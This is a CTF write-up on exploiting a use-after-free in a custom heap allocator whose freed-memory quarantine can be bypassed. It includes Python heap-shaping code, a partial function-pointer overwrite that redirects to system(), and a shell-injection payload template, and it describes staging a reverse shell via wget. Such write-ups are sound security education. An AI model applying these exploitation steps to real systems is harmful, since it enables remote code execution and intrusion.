Exploiting a Quarantine UAF Mitigation on a Custom Allocator Challenge
Introduction
In the previous blog post (A Reverse Engineering Walkthrough Journey) we have covered a walkthrough guide to solve the Reverse Engineering challenge written for the NoHat24 security conference. In this blog post, we are going to cover the binary exploitation challenge that involves a custom userland allocator that has been specifically developed for this challenge. Writing our own allocator, remotely inspired from the kernel SLUB allocator, was a really fun and educational experience. We have implemented an Use-After-Free quarantine mitigation to prevent its exploitation, was it good enough?
Introducing the Custom Allocator
The custom allocator source code was available through an HTTP web interface and can now be download directly from here. Two files, hmalloc.h
and hmalloc.c
, contains the whole implementation of the custom allocator that replaces the standard glibc malloc. The following diagram and structs describes the allocator design:
struct list_head{
struct list_head* next;
struct list_head* prev;
};
struct bucket{
struct list_head buckets;
/* Offset of the available alloc inside the bucket */
uint16_t offset;
/* How many allocs are freed */
uint8_t freelist_count;
uint8_t freelist[MAX_ALLOCS];
void* allocs[];
};
/* Single allocations just contain the size of the alloc as metadata */
struct alloc{
uint16_t size;
void* user[];
} __attribute__((packed));
The target allocator, inspired from the kernel SLUB allocator, has a simple “bucket” concept. Each allocation size (from 16 to 1024) has its own memory region retrieved from mmap
(through __init_bucket
) and it is considered a SMALL_BUCKET
, while larger buckets (LARGE_BUCKETS
) are not handled from the allocator. A Bucket Master Control (bucket_master_ctrl
global variable inside hmalloc.c
) is used to store buckets’ addresses using an offset that can be used to retrieve the requested bucket for the needed size. The size of the allocation is the offset minus the size of a pointer. For example, the bucket address for 32 bytes allocations is at offset 24 (32-8).
When malloc
is called the first time with a specific size, that is always rounded to the nearest power of two starting from 32 (e.g. 32, 64, 128, 256, 512, 1024), the bucket is allocated through __init_bucket
and referred to as the current_bucket
. The current bucket is the bucket from where we try to initially allocate from. It can be retrieved, once allocated, using __get_bucket
. Each allocation, named alloc
inside the source code, contains just the size of the allocation as metadata and alloc->user
is the returned malloc
pointer. When an alloc
is allocated from a bucket
, the bucket->offset
is incremented by one and used for the next allocations to return subsequent memory addresses (it is always multiplied with the allocation size). The offset does not just provides the capability to return new allocations but also marks and identifies freed allocations inside the bucket. A freelist is implemented to first return freed memory (to avoid fragmentation) with a LIFO mechanism. bucket->freelist
is an array of freed allocs
(based on their offsets) that can be accessed with the bucket->freelist_count
that is incremented every time an alloc
is freed and decremented when a freed allocation is returned back to the user. This “dynamic” array permits to handle the freelist pretty easily and is the first path to return an allocation from the __malloc
logic.
When the maximum number of allocations ((PAGE_SIZE - sizeof(struct bucket)) / alloc_size
) is reached for a bucket, a new bucket is created (through new mmap
memory) and linked through the list_head
next
and prev
members.
old_current_bucket->buckets.next = (struct list_head*) ¤t_bucket->buckets.next;
current_bucket->buckets.prev = (struct list_head*) &old_current_bucket->buckets.next;
The linked list permits to have more buckets linked together for each allocation size. When the current bucket is full (e.g. it is not possible to re-allocate freed allocs neither new allocs) previous and next buckets are verified (traversing the linked list backwards and forwards) and an allocation is returned if one of them contains a freed alloc on its freelist. Also, if the found bucket contains more than a specific amount of freed elements (FREELIST_REPLACE_BUCKET_THRESHOLD
) it is replaced as the current bucket from the bucket_master_ctrl
(through __update_master_ctrl_bucket
).
When free
is called with a pointer, the alloc
struct is retrieved through ptr - sizeof(struct alloc)
and the bucket obtained masking the pointer with 0xfff
(memory returned from mmap
is always page aligned). In order to calculate its offset inside the bucket, the allocation size retrieved from the metadata of the alloc
is used as a dividend to the allocation address minus bucket->allocs
(e.g. the first alloc is 0, the second 1, the third 2 and so on). The bucket->freelist[]
array is updated with the calculated offset and bucket->freelist_count
incremented by one.
Freelist quarantine mitigation
Before leaving the free
function, a global freelist_quarantine_time
variable is set with the current time. When verifying the freelist of the current bucket, the function __is_freelist_available
verify its availability. It is possible to return a freed alloc only if ten seconds (FREELIST_QUARANTINE_WAIT
) are passed from the last freed element:
bool __is_freelist_available(){
#ifdef FREELIST_QUARANTINE
if((time(NULL) - freelist_quarantine_time) < FREELIST_QUARANTINE_WAIT){
DEBUG_PRINT("[DEBUG] Freelist is quarantined\n");
return false;
}
return true;
#endif
return true;
}
This mitigations is aimed to prevent the immediate re-use of freed allocations (Use-After-Free vulnerabilities).
Freelist quarantine Weakness
However, the mitigation is not bullet proof, and this is the intended objective of the CTF. The freelist timer is only checked while searching for freed allocs inside the same bucket, but not when traversing. Suppose the following scenario:
- Two buckets (
bucket_1
andbucket_2
) are fully allocated (e.g. no available or freed allocations).bucket_2
is the “current” one (the one registered in the Bucket Master Control). - An alloc is freed from
bucket_1
. - When
malloc
is called (with the same size of the two buckets) the freelist ofbucket_2
is not available while, with traversing, the just freed alloc frombucket_1
is immediately available.
The described scenario can be useful to exploit an immediate UaF condition.
Main binary logic
The main binary logic (main.c
) is pretty simple. It reads from stdin 4096
bytes and parses it line by line, searching for commands to execute inside a switch
statement. Each line must begin with a valid command (CMD_CREATE
, CMD_ADD
, CMD_DELETE
, CMD_SELL
, CMD_DROP
) and follows a command specific format. For example, the CMD_CREATE
command allocates a struct object
(using malloc
) where malloc
is also used to allocate object->name
and object->description
using strlen
with some size validation. At the end of the command, the three function pointers (sell
, add
and drop
) are respectively set with function_sell
, function_add
and function_drop
, just like a primitive OOP language.
This is the mentioned struct:
struct object{
int id;
int price;
char* name;
char* description;
int stock;
int earnings;
void (*sell) (struct object* this);
void (*add) (struct object* this);
void (*drop) (struct object* this);
};
Also, when a new object
is allocated, an array of object pointers (objs
) is updated to store all of them. The array is later used for the vtable functions (sell
, add
and drop
) and to delete an object based on its specified id.
The vulnerability (UAF)
The vulnerability is pretty straightforward: when an object is freed (through CMD_FREE
), the objs
array is not updated and the dangling pointer can be still accessed without further validations from another command (Use-After-Free) or itself (Double Free).
However, there is just one big obstacle: the freelist quarantine mitigation does not permit an immediate Use-After-Free. In order to exploit the UAF, it is necessary to re-create an heap layout similar to the one described in “Freelist quarantine Weakness”, where we can trigger the UAF against an allocation from a non current bucket.
Exploitation
Objective
Let’s first declare an objective. As simple as it sounds, we want to compromise the binary application (that is exposed through socat
) and read the flag. We have a UAF primitive on a struct object
that contains interesting members: dynamic strings (that we can use to overlap the freed allocation) and three function pointers. Function pointers, that behave like a vtable, seems like a really juicy target since they are allocated in the heap (inside the object structure) and can be triggered from multiple commands. Name and description members are really interesting allocations that can be used to replace the freed alloc due to their flexible size based on user input.
Also, since we have a single interaction with the program (we pass everything through stdin once) we cannot use read primitives or similar to leak ASLR. We can go for a bruteforce or a partial overwrite in order to don’t mess too much with randomized pointers.
Heap shaping to bypass the quarantine
With a clearer path in mind, let’s start to create the UAF state with python step by step:
objs = []
content = ""
# Objective:
# Allocate 2 64 bytes buckets and make them full
# 520 = sizeof(struct bucket)
# 4096 - 520 = 3576 / 64 = 55
for n in range(0, 55 * 2):
obj_id = pack("<h", int(n)).decode()
objs.append(obj_id)
# print_stderr("[*] Creating object {}".format(n))
# Create
content += "\x10" # CMD_CREATE
content += obj_id
content += "\x16\x00"
content += "\x41" * 20 + "\x00"
content += "\x42" * 4 + "\x00"
content += "\n"
We fulfill two buckets (bucket_1
and bucket_2
) with 110 allocations of struct object
. The size of struct object
is 58
, hence it goes into the bucket of 64 bytes allocations (we can call it bucket_64
). The bucket_64
can contains up to 55 allocations since the PAGE_SIZE
memory region (4096) minus the size of the struct bucket
metadata (520) and divided by its size (64), it’s 55.
# DELETE (Free)
content += "\x12"
content += objs[0]
content += "\n"
# DELETE (Free)
content += "\x12"
content += objs[1]
content += "\n"
We then proceed to free the first two allocations from bucket_1
. We free two of them since the last one (due to the LIFO freelist order) will be replaced, using the CMD_CREATE
command, with another struct object
(malloc(sizeof(struct object));
) and initialized with zeros (removing the possibility of a partial overwrite to bypass ASLR). The first freed allocation, instead, can be replaced with arbitrary user input due to the dynamic allocation through strlen
. Due to this function, however, we are limited to its internal behaviors (e.g. it is not possible to have NULL bytes inside our payload).
Partial Overwrite
We can create, through CMD_CREATE
, a fake object inside the name
or the description
string allocation, by making its size falling inside the bucket_64
, in order to trigger the UAF against it.
We can perform a partial overwrite through the memcpy
function (on the freed object) by replacing one or two bytes in order to not affect ASLR at all. execute_system
is an interesting function that accepts a char pointer and pass it as a parameter to system
, allowing the execution of arbitrary shell code. It can be a really interesting primitive due to a crucial thing: the rdi
register (e.g. the first parameter) is the object itself (this
) for function pointers. This means that, if we can redirect the execution to execute_system
, we control entirely the first parameter that is the command to be executed! In order to see what we need to partially overwrite, we can execute objdump
against the binary:
$ objdump -D -M intel main | grep '<execute_system\|function_drop'
0000000000001270 <execute_system>:
00000000000012c0 <function_drop>:
The function_drop
address is 00000000000012c0
, while execute_system
is 0000000000001270
. If we overwrite the last byte of the object->drop
pointer with 0x70
and we execute the CMD_DROP
command later, we can trigger the execution of system
with input in our control (the last allocated object itself):
# ID & price
fake_obj = "AA;$({});#".format(cmd)
#fake_obj += "\x41" * 0x2c
fake_obj += "\x41" * ( 0x30 - len(fake_obj) )
# CMD_DROP function pointer => @execute_system
# @execute_system
fake_obj += "\x70" + "\x00"
# Create => alloc bucket1->freelist[1]
content += "\x10"
content += "\x37\x13" # sh
content += "\x16\x00"
# Name: system payload
content += "BB\x00"
# Description: alloc on bucket1->freelist[0] (obj[0])
content += fake_obj
content += "\n"
# CMD_DROP => Trigger arbitrary function call
content += "\x14"
content += "\x41\x41"
content += "\n"
Since the struct object
allocation is limited in size for a direct reverse shell, the vulnerability is exploited three times to first upload a complete reverse shell through wget
, chmod
and finally execute it.
Alternative Solution (Double Free)
An alternative, originally not the intended solution, can be to exploit the Double Free vulnerability instead. It is possible to return the same alloc
twice by inserting (through exploitation) the same freelist offset inside the bucket->freelist
and achieve the same objective. If you have solved the challenge in that way at the NoHat CTF or in a different moment, we are really curious about that, let us know!
Conclusion
The final exploit can be found here. Hope you have enjoyed this two article series on some of our CTF write-ups for the NoHat24 CTF event. We have already planned some hardware, firmware and fuzzing articles for this December. If your are interested, stay tuned for that and, as always, happy hacking!
Interested in more CTFs like this one to prove your skills? Check out play.pwnx.io!